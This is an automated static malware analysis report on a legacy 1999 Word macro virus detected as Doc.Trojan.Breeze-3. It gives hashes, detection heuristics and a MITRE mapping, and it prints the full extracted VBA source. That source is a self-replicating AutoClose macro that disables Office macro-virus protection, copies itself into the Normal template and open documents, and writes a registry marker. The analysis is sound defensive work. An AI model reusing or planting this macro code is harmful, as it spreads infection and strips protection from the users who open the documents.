Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a72861d46eb9d419…

MALICIOUS

Office (OLE)

32.0 KB Created: 1999-07-08 12:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: bfe667eb5e6287977fb02b8146a73f9a SHA-1: 73ccee4058510c58741ca6202b49eeb590a97497 SHA-256: a72861d46eb9d419d854cd9b182c3a78f69d99c2b63aeee80f4476c5301d3324
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and exhibits characteristics of a legacy WordBasic macro virus. The Auto_Close macro is present, which is designed to execute automatically when the document is closed. This macro attempts to write a value to the registry key HKEY_CURRENT_USER\Weather, indicating a potential persistence or configuration mechanism.

Heuristics 5

  • ClamAV: Doc.Trojan.Breeze-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Breeze-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose() 'weather
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1033 bytes
SHA-256: bdd65ee6f2895b1d49c429f8e8b4aba2f74201a09b16bb1d0bfff294f4475c2b
Detection
ClamAV: Doc.Trojan.Breeze-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Weather"
Sub AutoClose() 'weather
On Error Resume Next
Options.VirusProtection = False
If NormalTemplate.VBProject.VBComponents.Item("weather").codemodule.lines(1, 1) <> "Sub AutoClose() 'weather" Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "weather", wdOrganizerObjectProjectItems
If ActiveDocument.VBProject.VBComponents.Item("weather").codemodule.lines(1, 1) <> "Sub AutoClose() 'weather" Then Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "weather", wdOrganizerObjectProjectItems
System.PrivateProfileString("", "HKEY_CURRENT_USER\", "Weather") = "f0re's Macro Contest Contribution !"
End Sub

'Weather (c)1999 f0re [UC/Skamwerks/DVC]
'Contribution to the LineZer0 Macro Contest